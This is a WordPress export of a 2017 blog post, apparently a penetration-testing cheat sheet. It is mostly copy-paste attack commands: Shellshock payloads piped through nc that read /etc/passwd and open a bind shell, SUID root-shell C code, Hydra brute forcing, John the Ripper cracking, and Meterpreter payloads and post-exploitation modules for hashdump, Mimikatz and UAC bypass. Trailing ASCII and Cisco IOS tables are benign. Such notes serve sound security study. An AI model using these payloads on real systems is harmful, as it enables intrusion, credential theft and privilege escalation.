{"id":1329,"date":"2017-03-27T18:54:27","date_gmt":"2017-03-27T22:54:27","guid":{"rendered":"https:\/\/easy-admin.ca\/?p=1329"},"modified":"2017-04-02T20:26:04","modified_gmt":"2017-04-03T00:26:04","slug":"notes-2","status":"publish","type":"post","link":"https:\/\/easy-admin.ca\/index.php\/2017\/03\/27\/notes-2\/","title":{"rendered":"Notes"},"content":{"rendered":"

BOF<\/span> \/ Exploit<\/i><\/h2>\n

Exploit Research<\/i><\/h2>\n

Find exploits for enumerated hosts \/ services.<\/p>\n

\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
searchsploit windows 2003 | grep -i local<\/code><\/td>\nSearch exploit-db for exploit, in this example windows 2003 + local esc<\/td>\n<\/tr>\n
site:exploit-db.com exploit kernel <= 3<\/code><\/td>\nUse google to search exploit-db.com for exploits<\/td>\n<\/tr>\n
grep -R \"W7\" \/usr\/share\/metasploit-framework
\n\/modules\/exploit\/windows\/*<\/code><\/td>\n		Search metasploit modules using grep – msf search sucks a bit<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n

Searching for Exploits<\/i><\/h3>\n

Install local copy of exploit-db:<\/p>\n

\n
 searchsploit \u2013u\r\n searchsploit apache 2.2\r\n searchsploit \"Linux Kernel\"\r\n searchsploit linux 2.6 | grep -i ubuntu | grep local\r\n<\/code><\/pre>\n<\/div>\n
Compiling Windows Exploits on Kali<\/i><\/h3>\n
\n
  wget -O mingw-get-setup.exe http:\/\/sourceforge.net\/projects\/mingw\/files\/Installer\/mingw-get-setup.exe\/download\r\n  wine mingw-get-setup.exe\r\n  select mingw32-base\r\n  cd \/root\/.wine\/drive_c\/windows\r\n  wget http:\/\/gojhonny.com\/misc\/mingw_bin.zip && unzip mingw_bin.zip\r\n  cd \/root\/.wine\/drive_c\/MinGW\/bin\r\n  wine gcc -o ability.exe \/tmp\/exploit.c -lwsock32\r\n  wine ability.exe  \r\n<\/code><\/pre>\n<\/div>\n
Cross Compiling Exploits<\/i><\/h3>\n
\n
gcc -m32 -o output32 hello.c (32 bit)\r\ngcc -m64 -o output hello.c (64 bit)\r\n<\/code><\/pre>\n<\/div>\n
Exploiting Common Vulnerabilities<\/i><\/h3>\n
Exploiting Shellshock<\/i><\/h4>\n
A tool to find and exploit servers vulnerable to Shellshock:<\/p>\n
\n
git clone https:\/\/github.com\/nccgroup\/shocker\r\n<\/code><\/pre>\n<\/div>\n
\n
.\/shocker.py -H TARGET  --command \"\/bin\/cat \/etc\/passwd\" -c \/cgi-bin\/status --verbose\r\n<\/code><\/pre>\n<\/div>\n
cat file (view file contents)<\/i><\/h5>\n
\n
echo -e \"HEAD \/cgi-bin\/status HTTP\/1.1\\r\\nUser-Agent: () { :;}; echo \\$(<\/etc\/passwd)\\r\\nHost: vulnerable\\r\\nConnection: close\\r\\n\\r\\n\" | nc TARGET 80\r\n<\/code><\/pre>\n<\/div>\n
Shell Shock run bind shell<\/i><\/h5>\n
\n
echo -e \"HEAD \/cgi-bin\/status HTTP\/1.1\\r\\nUser-Agent: () { :;}; \/usr\/bin\/nc -l -p 9999 -e \/bin\/sh\\r\\nHost: vulnerable\\r\\nConnection: close\\r\\n\\r\\n\" | nc TARGET 80\r\n<\/code><\/pre>\n<\/div>\n
Shell Shock reverse Shell<\/i><\/h5>\n
\n
nc -l -p 443\r\n<\/code><\/pre>\n<\/div>\n
Simple Local Web Servers<\/i><\/h2>\n
Python local web server command, handy for serving up shells and exploits on an attacking machine.<\/p>\n
\n\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
python -m SimpleHTTPServer 80<\/code><\/td>\nRun a basic http server, great for serving up shells etc<\/td>\n<\/tr>\n
python3 -m http.server<\/code><\/td>\nRun a basic Python3 http server, great for serving up shells etc<\/td>\n<\/tr>\n
ruby -rwebrick -e \"WEBrick::HTTPServer.new
\n(:Port => 80, :DocumentRoot => Dir.pwd).start\"<\/code><\/td>\n		Run a ruby webrick basic http server<\/td>\n<\/tr>\n
php -S 0.0.0.0:80<\/code><\/td>\nRun a basic PHP http server<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Mounting File Shares<\/i><\/h2>\n
How to mount NFS \/ CIFS, Windows and Linux file shares.<\/p>\n
\n\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
mount 192.168.1.1:\/vol\/share \/mnt\/nfs<\/code><\/td>\nMount NFS share to \/mnt\/nfs<\/code><\/td>\n<\/tr>\n
mount -t cifs -o username=user,password=pass
\n,domain=blah \/\/192.168.1.X\/share-name \/mnt\/cifs<\/code><\/td>\n		Mount Windows CIFS \/ SMB share on Linux at \/mnt\/cifs<\/code> if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)<\/td>\n<\/tr>\n
net use Z: \\\\win-server\\share password
\n\/user:domain\\janedoe \/savecred \/p:no<\/code><\/td>\n		Mount a Windows share on Windows from the command line<\/td>\n<\/tr>\n
apt-get install smb4k -y<\/code><\/td>\nInstall smb4k on Kali, useful Linux GUI for browsing SMB shares<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
HTTP \/ HTTPS Webserver Enumeration<\/i><\/h2>\n
\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
nikto -h 192.168.1.1<\/code><\/td>\nPerform a nikto scan against target<\/td>\n<\/tr>\n
dirbuster<\/code><\/td>\nConfigure via GUI, CLI input doesn’t work most of the time<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Packet Inspection<\/i><\/h2>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
tcpdump tcp port 80 -w output.pcap -i eth0<\/code><\/td>\ntcpdump for port 80 on interface eth0, outputs to output.pcap<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Username Enumeration<\/i><\/h2>\n
Some techniques used to remotely enumerate users on a target system.<\/p>\n
SMB User Enumeration<\/i><\/h3>\n
\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
python \/usr\/share\/doc\/python-impacket-doc\/examples
\n\/samrdump.py 192.168.XXX.XXX<\/code><\/td>\n		Enumerate users from SMB<\/td>\n<\/tr>\n
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt<\/code><\/td>\nRID cycle SMB \/ enumerate users from SMB<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
SNMP User Enumeration<\/i><\/h3>\n
\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
\n|cut -d\u201d \u201c -f4<\/code><\/td>\n		Enmerate users from SNMP<\/td>\n<\/tr>\n
python \/usr\/share\/doc\/python-impacket-doc\/examples\/
\nsamrdump.py SNMP 192.168.X.XXX<\/code><\/td>\n		Enmerate users from SNMP<\/td>\n<\/tr>\n
nmap -sT -p 161 192.168.X.XXX\/254 -oG snmp_results.txt
\n(then grep)<\/code><\/td>\n		Search for SNMP servers with nmap, grepable output<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Passwords<\/i><\/h2>\n
Wordlists<\/i><\/h3>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
\/usr\/share\/wordlists<\/code><\/td>\nKali word lists<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Brute Forcing Services<\/i><\/h2>\n
Hydra FTP Brute Force<\/i><\/h3>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
hydra -l USERNAME -P \/usr\/share\/wordlistsnmap.lst -f
\n192.168.X.XXX ftp -V<\/code><\/td>\n		Hydra FTP brute force<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Hydra POP3 Brute Force<\/i><\/h3>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
hydra -l USERNAME -P \/usr\/share\/wordlistsnmap.lst -f
\n192.168.X.XXX pop3 -V<\/code><\/td>\n		Hydra POP3 brute force<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Hydra SMTP Brute Force<\/i><\/h3>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
hydra -P \/usr\/share\/wordlistsnmap.lst 192.168.X.XXX smtp -V<\/code><\/td>\nHydra SMTP brute force<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Use -t<\/code> to limit concurrent connections, example: -t 15<\/code><\/p>\n
Password Cracking<\/i><\/h2>\n
John The Ripper – JTR<\/i><\/h3>\n
\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hashes<\/code><\/td>\nJTR password cracking<\/td>\n<\/tr>\n
john --format=descrypt --wordlist
\n\/usr\/share\/wordlists\/rockyou.txt hash.txt<\/code><\/td>\n		JTR forced descrypt cracking with wordlist<\/td>\n<\/tr>\n
john --format=descrypt hash --show<\/code><\/td>\nJTR forced descrypt brute force cracking<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Windows Penetration Testing Commands<\/i><\/h2>\n
See Windows Penetration Testing Commands<\/strong>.<\/p>\n
Linux Penetration Testing Commands<\/i><\/h2>\n
See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.<\/p>\n
Compiling Exploits<\/i><\/h2>\n
Some notes on compiling exploits.<\/p>\n
Identifying if C code is for Windows or Linux<\/i><\/h3>\n
C #includes will indicate which OS should be used to build the exploit.<\/p>\n
\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
process.h, string.h, winbase.h, windows.h, winsock2.h<\/code><\/td>\nWindows exploit code<\/td>\n<\/tr>\n
arpa\/inet.h, fcntl.h, netdb.h, netinet\/in.h,
\nsys\/sockt.h, sys\/types.h, unistd.h<\/code><\/td>\n		Linux exploit code<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Build Exploit GCC<\/i><\/h3>\n
Compile exploit gcc.<\/p>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
gcc -o exploit exploit.c<\/code><\/td>\nBasic GCC compile<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
GCC Compile 32Bit Exploit on 64Bit Kali<\/i><\/h3>\n
Handy for cross compiling 32 bit binaries on 64 bit attacking machines.<\/p>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
gcc -m32 exploit.c -o exploit<\/code><\/td>\nCross compile 32 bit binary on 64 bit Linux<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Compile Windows .exe on Linux<\/i><\/h3>\n
Build \/ compile windows exploits on Linux, resulting in a .exe file.<\/p>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe<\/code><\/td>\nCompile windows .exe on Linux<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
SUID Binary<\/i><\/h2>\n
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID \/ GID and shell as required.<\/p>\n
below are some quick copy and pate examples for various shells:<\/p>\n
SUID C Shell for \/bin\/bash<\/i><\/h3>\n
\n
int<\/span> main<\/span>(<\/span>void<\/span>){<\/span>\r\n       setresuid<\/span>(<\/span>0<\/span>,<\/span> 0<\/span>,<\/span> 0<\/span>);<\/span>\r\n       system<\/span>(<\/span>\"\/bin\/bash\"<\/span>);<\/span>\r\n}<\/span>       <\/code><\/pre>\n<\/figure>\n
SUID C Shell for \/bin\/sh<\/i><\/h3>\n
\n
int<\/span> main<\/span>(<\/span>void<\/span>){<\/span>\r\n       setresuid<\/span>(<\/span>0<\/span>,<\/span> 0<\/span>,<\/span> 0<\/span>);<\/span>\r\n       system<\/span>(<\/span>\"\/bin\/sh\"<\/span>);<\/span>\r\n}<\/span>       <\/code><\/pre>\n<\/figure>\n
Building the SUID Shell binary<\/i><\/h3>\n
\n
gcc -o suid suid.c  <\/code><\/pre>\n<\/figure>\n
For 32 bit:<\/p>\n
\n
gcc -m32 -o suid suid.c  <\/code><\/pre>\n<\/figure>\n
Reverse Shells<\/i><\/h2>\n
See Reverse Shell Cheat Sheet<\/a> for a list of useful Reverse Shells.<\/p>\n
TTY Shells<\/i><\/h2>\n
Tips \/ Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su<\/code> from reverse shells.<\/p>\n
Python TTY Shell Trick<\/i><\/h3>\n
\n
python<\/span> -<\/span>c<\/span> 'import pty;pty.spawn(\"\/bin\/bash\")'<\/span><\/code><\/pre>\n<\/figure>\n
\n
echo <\/span>os.system(<\/span>'\/bin\/bash'<\/span>)<\/span><\/code><\/pre>\n<\/figure>\n
Spawn Interactive sh shell<\/i><\/h3>\n
\n
\/bin\/sh -i<\/code><\/pre>\n<\/figure>\n
Spawn Perl TTY Shell<\/i><\/h3>\n
\n
exec<\/span> \"\/bin\/sh\"<\/span>;<\/span>\r\nperl<\/span> \u2014<\/span>e<\/span> 'exec \"\/bin\/sh\";'<\/span><\/code><\/pre>\n<\/figure>\n
Spawn Ruby TTY Shell<\/i><\/h3>\n
\n
exec<\/span> \"\/bin\/sh\"<\/span><\/code><\/pre>\n<\/figure>\n
Spawn Lua TTY Shell<\/i><\/h3>\n
\n
os.execute<\/span>(<\/span>'\/bin\/sh'<\/span>)<\/span><\/code><\/pre>\n<\/figure>\n
Spawn TTY Shell from Vi<\/i><\/h3>\n
Run shell commands from vi:<\/p>\n
\n
:!bash<\/code><\/pre>\n<\/figure>\n
Spawn TTY Shell NMAP<\/i><\/h3>\n
\n
!sh<\/code><\/pre>\n<\/figure>\n
Metasploit<\/i><\/h2>\n
Some basic Metasploit stuff, that I have found handy for reference.<\/p>\n
Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting<\/a> techniques.<\/p>\n
Meterpreter Payloads<\/i><\/h3>\n
Windows reverse meterpreter payload<\/i><\/h3>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
set payload windows\/meterpreter\/reverse_tcp<\/code><\/td>\nWindows reverse tcp payload<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Windows VNC Meterpreter payload<\/i><\/h3>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
set payload windows\/vncinject\/reverse_tcp<\/code><\/p>\n
set ViewOnly false<\/code><\/td>\n
Meterpreter Windows VNC Payload<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Linux Reverse Meterpreter payload<\/i><\/h3>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
set payload linux\/meterpreter\/reverse_tcp<\/code><\/td>\nMeterpreter Linux Reverse Payload<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Meterpreter Cheat Sheet<\/i><\/h2>\n
Useful meterpreter commands.<\/p>\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
upload file c:\\\\windows<\/code><\/td>\nMeterpreter upload file to Windows target<\/td>\n<\/tr>\n
download c:\\\\windows\\\\repair\\\\sam \/tmp<\/code><\/td>\nMeterpreter download file from Windows target<\/td>\n<\/tr>\n
download c:\\\\windows\\\\repair\\\\sam \/tmp<\/code><\/td>\nMeterpreter download file from Windows target<\/td>\n<\/tr>\n
execute -f c:\\\\windows\\temp\\exploit.exe<\/code><\/td>\nMeterpreter run .exe on target – handy for executing uploaded exploits<\/td>\n<\/tr>\n
execute -f cmd -c <\/code><\/td>\nCreates new channel with cmd shell<\/td>\n<\/tr>\n
ps<\/code><\/td>\nMeterpreter show processes<\/td>\n<\/tr>\n
shell<\/code><\/td>\nMeterpreter get shell on the target<\/td>\n<\/tr>\n
getsystem<\/code><\/td>\nMeterpreter attempts priviledge escalation the target<\/td>\n<\/tr>\n
hashdump<\/code><\/td>\nMeterpreter attempts to dump the hashes on the target<\/td>\n<\/tr>\n
portfwd add \u2013l 3389 \u2013p 3389 \u2013r target<\/code><\/td>\nMeterpreter create port forward to target machine<\/td>\n<\/tr>\n
portfwd delete \u2013l 3389 \u2013p 3389 \u2013r target<\/code><\/td>\nMeterpreter delete port forward<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Common Metasploit Modules<\/i><\/h2>\n
Top metasploit modules.<\/p>\n
Remote Windows Metasploit Modules (exploits)<\/i><\/h3>\n
\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
use exploit\/windows\/smb\/ms08_067_netapi<\/code><\/td>\nMS08_067 Windows 2k, XP, 2003 Remote Exploit<\/td>\n<\/tr>\n
use exploit\/windows\/dcerpc\/ms06_040_netapi<\/code><\/td>\nMS08_040 Windows NT, 2k, XP, 2003 Remote Exploit<\/td>\n<\/tr>\n
use exploit\/windows\/smb\/
\nms09_050_smb2_negotiate_func_index<\/code><\/td>\n		MS09_050 Windows Vista SP1\/SP2 and Server 2008 (x86) Remote Exploit<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Local Windows Metasploit Modules (exploits)<\/i><\/h3>\n
\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
use exploit\/windows\/local\/bypassuac<\/code><\/td>\nBypass UAC on Windows 7 + Set target + arch, x86\/64<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Auxilary Metasploit Modules<\/i><\/h3>\n
\n\n\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
use auxiliary\/scanner\/http\/dir_scanner<\/code><\/td>\nMetasploit HTTP directory scanner<\/td>\n<\/tr>\n
use auxiliary\/scanner\/http\/jboss_vulnscan<\/code><\/td>\nMetasploit JBOSS vulnerability scanner<\/td>\n<\/tr>\n
use auxiliary\/scanner\/mssql\/mssql_login<\/code><\/td>\nMetasploit MSSQL Credential Scanner<\/td>\n<\/tr>\n
use auxiliary\/scanner\/mysql\/mysql_version<\/code><\/td>\nMetasploit MSSQL Version Scanner<\/td>\n<\/tr>\n
use auxiliary\/scanner\/oracle\/oracle_login<\/code><\/td>\nMetasploit Oracle Login Module<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Metasploit Powershell Modules<\/i><\/h3>\n
\n\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
use exploit\/multi\/script\/web_delivery<\/code><\/td>\nMetasploit powershell payload delivery module<\/td>\n<\/tr>\n
post\/windows\/manage\/powershell\/exec_powershell<\/code><\/td>\nMetasploit upload and run powershell script through a session<\/td>\n<\/tr>\n
use exploit\/multi\/http\/jboss_maindeployer<\/code><\/td>\nMetasploit JBOSS deploy<\/td>\n<\/tr>\n
use exploit\/windows\/mssql\/mssql_payload<\/code><\/td>\nMetasploit MSSQL payload<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Post Exploit Windows Metasploit Modules<\/i><\/h3>\n
Windows Metasploit Modules for privilege escalation.<\/p>\n
\n\n\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
run post\/windows\/gather\/win_privs<\/code><\/td>\nMetasploit show privileges of current user<\/td>\n<\/tr>\n
use post\/windows\/gather\/credentials\/gpp<\/code><\/td>\nMetasploit grab GPP saved passwords<\/td>\n<\/tr>\n
load mimikatz -> wdigest<\/code><\/td>\nMetasplit load Mimikatz<\/td>\n<\/tr>\n
run post\/windows\/gather\/local_admin_search_enum<\/code><\/td>\nIdenitfy other machines that the supplied domain user has administrative access to<\/td>\n<\/tr>\n
run post\/windows\/gather\/smart_hashdump<\/code><\/td>\nAutomated dumping of sam file, tries to esc privileges etc<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
ASCII Table Cheat Sheet<\/i><\/h2>\n
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.<\/p>\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
ASCII<\/th>\nCHARACTER<\/th>\n<\/tr>\n<\/thead>\n
x00<\/code><\/td>\nNull Byte<\/td>\n<\/tr>\n
x08<\/code><\/td>\nBS<\/td>\n<\/tr>\n
x09<\/code><\/td>\nTAB<\/td>\n<\/tr>\n
x0a<\/code><\/td>\nLF<\/td>\n<\/tr>\n
x0d<\/code><\/td>\nCR<\/td>\n<\/tr>\n
x1b<\/code><\/td>\nESC<\/td>\n<\/tr>\n
x20<\/code><\/td>\nSPC<\/td>\n<\/tr>\n
x21<\/code><\/td>\n!<\/td>\n<\/tr>\n
x22<\/code><\/td>\n“<\/td>\n<\/tr>\n
x23<\/code><\/td>\n#<\/td>\n<\/tr>\n
x24<\/code><\/td>\n$<\/td>\n<\/tr>\n
x25<\/code><\/td>\n%<\/td>\n<\/tr>\n
x26<\/code><\/td>\n&<\/td>\n<\/tr>\n
x27<\/code><\/td>\n`<\/td>\n<\/tr>\n
x28<\/code><\/td>\n(<\/td>\n<\/tr>\n
x29<\/code><\/td>\n)<\/td>\n<\/tr>\n
x2a<\/code><\/td>\n*<\/td>\n<\/tr>\n
x2b<\/code><\/td>\n+<\/td>\n<\/tr>\n
x2c<\/code><\/td>\n,<\/td>\n<\/tr>\n
x2d<\/code><\/td>\n–<\/td>\n<\/tr>\n
x2e<\/code><\/td>\n.<\/td>\n<\/tr>\n
x2f<\/code><\/td>\n\/<\/td>\n<\/tr>\n
x30<\/code><\/td>\n0<\/td>\n<\/tr>\n
x31<\/code><\/td>\n1<\/td>\n<\/tr>\n
x32<\/code><\/td>\n2<\/td>\n<\/tr>\n
x33<\/code><\/td>\n3<\/td>\n<\/tr>\n
x34<\/code><\/td>\n4<\/td>\n<\/tr>\n
x35<\/code><\/td>\n5<\/td>\n<\/tr>\n
x36<\/code><\/td>\n6<\/td>\n<\/tr>\n
x37<\/code><\/td>\n7<\/td>\n<\/tr>\n
x38<\/code><\/td>\n8<\/td>\n<\/tr>\n
x39<\/code><\/td>\n9<\/td>\n<\/tr>\n
x3a<\/code><\/td>\n:<\/td>\n<\/tr>\n
x3b<\/code><\/td>\n;<\/td>\n<\/tr>\n
x3c<\/code><\/td>\n<<\/td>\n<\/tr>\n
x3d<\/code><\/td>\n=<\/td>\n<\/tr>\n
x3e<\/code><\/td>\n><\/td>\n<\/tr>\n
x3f<\/code><\/td>\n?<\/td>\n<\/tr>\n
x40<\/code><\/td>\n@<\/td>\n<\/tr>\n
x41<\/code><\/td>\nA<\/td>\n<\/tr>\n
x42<\/code><\/td>\nB<\/td>\n<\/tr>\n
x43<\/code><\/td>\nC<\/td>\n<\/tr>\n
x44<\/code><\/td>\nD<\/td>\n<\/tr>\n
x45<\/code><\/td>\nE<\/td>\n<\/tr>\n
x46<\/code><\/td>\nF<\/td>\n<\/tr>\n
x47<\/code><\/td>\nG<\/td>\n<\/tr>\n
x48<\/code><\/td>\nH<\/td>\n<\/tr>\n
x49<\/code><\/td>\nI<\/td>\n<\/tr>\n
x4a<\/code><\/td>\nJ<\/td>\n<\/tr>\n
x4b<\/code><\/td>\nK<\/td>\n<\/tr>\n
x4c<\/code><\/td>\nL<\/td>\n<\/tr>\n
x4d<\/code><\/td>\nM<\/td>\n<\/tr>\n
x4e<\/code><\/td>\nN<\/td>\n<\/tr>\n
x4f<\/code><\/td>\nO<\/td>\n<\/tr>\n
x50<\/code><\/td>\nP<\/td>\n<\/tr>\n
x51<\/code><\/td>\nQ<\/td>\n<\/tr>\n
x52<\/code><\/td>\nR<\/td>\n<\/tr>\n
x53<\/code><\/td>\nS<\/td>\n<\/tr>\n
x54<\/code><\/td>\nT<\/td>\n<\/tr>\n
x55<\/code><\/td>\nU<\/td>\n<\/tr>\n
x56<\/code><\/td>\nV<\/td>\n<\/tr>\n
x57<\/code><\/td>\nW<\/td>\n<\/tr>\n
x58<\/code><\/td>\nX<\/td>\n<\/tr>\n
x59<\/code><\/td>\nY<\/td>\n<\/tr>\n
x5a<\/code><\/td>\nZ<\/td>\n<\/tr>\n
x5b<\/code><\/td>\n[<\/td>\n<\/tr>\n
x5c<\/code><\/td>\n\\<\/td>\n<\/tr>\n
x5d<\/code><\/td>\n]<\/td>\n<\/tr>\n
x5e<\/code><\/td>\n^<\/td>\n<\/tr>\n
x5f<\/code><\/td>\n_<\/td>\n<\/tr>\n
x60<\/code><\/td>\n`<\/td>\n<\/tr>\n
x61<\/code><\/td>\na<\/td>\n<\/tr>\n
x62<\/code><\/td>\nb<\/td>\n<\/tr>\n
x63<\/code><\/td>\nc<\/td>\n<\/tr>\n
x64<\/code><\/td>\nd<\/td>\n<\/tr>\n
x65<\/code><\/td>\ne<\/td>\n<\/tr>\n
x66<\/code><\/td>\nf<\/td>\n<\/tr>\n
x67<\/code><\/td>\ng<\/td>\n<\/tr>\n
x68<\/code><\/td>\nh<\/td>\n<\/tr>\n
x69<\/code><\/td>\ni<\/td>\n<\/tr>\n
x6a<\/code><\/td>\nj<\/td>\n<\/tr>\n
x6b<\/code><\/td>\nk<\/td>\n<\/tr>\n
x6c<\/code><\/td>\nl<\/td>\n<\/tr>\n
x6d<\/code><\/td>\nm<\/td>\n<\/tr>\n
x6e<\/code><\/td>\nn<\/td>\n<\/tr>\n
x6f<\/code><\/td>\no<\/td>\n<\/tr>\n
x70<\/code><\/td>\np<\/td>\n<\/tr>\n
x71<\/code><\/td>\nq<\/td>\n<\/tr>\n
x72<\/code><\/td>\nr<\/td>\n<\/tr>\n
x73<\/code><\/td>\ns<\/td>\n<\/tr>\n
x74<\/code><\/td>\nt<\/td>\n<\/tr>\n
x75<\/code><\/td>\nu<\/td>\n<\/tr>\n
x76<\/code><\/td>\nv<\/td>\n<\/tr>\n
x77<\/code><\/td>\nw<\/td>\n<\/tr>\n
x78<\/code><\/td>\nx<\/td>\n<\/tr>\n
x79<\/code><\/td>\ny<\/td>\n<\/tr>\n
x7a<\/code><\/td>\nz<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
CISCO IOS Commands<\/i><\/h2>\n
A collection of useful Cisco IOS commands.<\/p>\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
enable<\/code><\/td>\nEnters enable mode<\/td>\n<\/tr>\n
conf t<\/code><\/td>\nShort for, configure terminal<\/td>\n<\/tr>\n
(config)# interface fa0\/0<\/code><\/td>\nConfigure FastEthernet 0\/0<\/td>\n<\/tr>\n
(config-if)# ip addr 0.0.0.0 255.255.255.255<\/code><\/td>\nAdd ip to fa0\/0<\/td>\n<\/tr>\n
(config-if)# ip addr 0.0.0.0 255.255.255.255<\/code><\/td>\nAdd ip to fa0\/0<\/td>\n<\/tr>\n
(config-if)# line vty 0 4<\/code><\/td>\nConfigure vty line<\/td>\n<\/tr>\n
(config-line)# login<\/code><\/td>\nCisco set telnet password<\/td>\n<\/tr>\n
(config-line)# password YOUR-PASSWORD<\/code><\/td>\nSet telnet password<\/td>\n<\/tr>\n
# show running-config<\/code><\/td>\nShow running config loaded in memory<\/td>\n<\/tr>\n
# show startup-config<\/code><\/td>\nShow sartup config<\/td>\n<\/tr>\n
# show version<\/code><\/td>\nshow cisco IOS version<\/td>\n<\/tr>\n
# show session<\/code><\/td>\ndisplay open sessions<\/td>\n<\/tr>\n
# show ip interface<\/code><\/td>\nShow network interfaces<\/td>\n<\/tr>\n
# show interface e0<\/code><\/td>\nShow detailed interface info<\/td>\n<\/tr>\n
# show ip route<\/code><\/td>\nShow routes<\/td>\n<\/tr>\n
# show access-lists<\/code><\/td>\nShow access lists<\/td>\n<\/tr>\n
# dir file systems<\/code><\/td>\nShow available files<\/td>\n<\/tr>\n
# dir all-filesystems<\/code><\/td>\nFile information<\/td>\n<\/tr>\n
# dir \/all<\/code><\/td>\nSHow deleted files<\/td>\n<\/tr>\n
# terminal length 0<\/code><\/td>\nNo limit on terminal output<\/td>\n<\/tr>\n
# copy running-config tftp<\/code><\/td>\nCopys running config to tftp server<\/td>\n<\/tr>\n
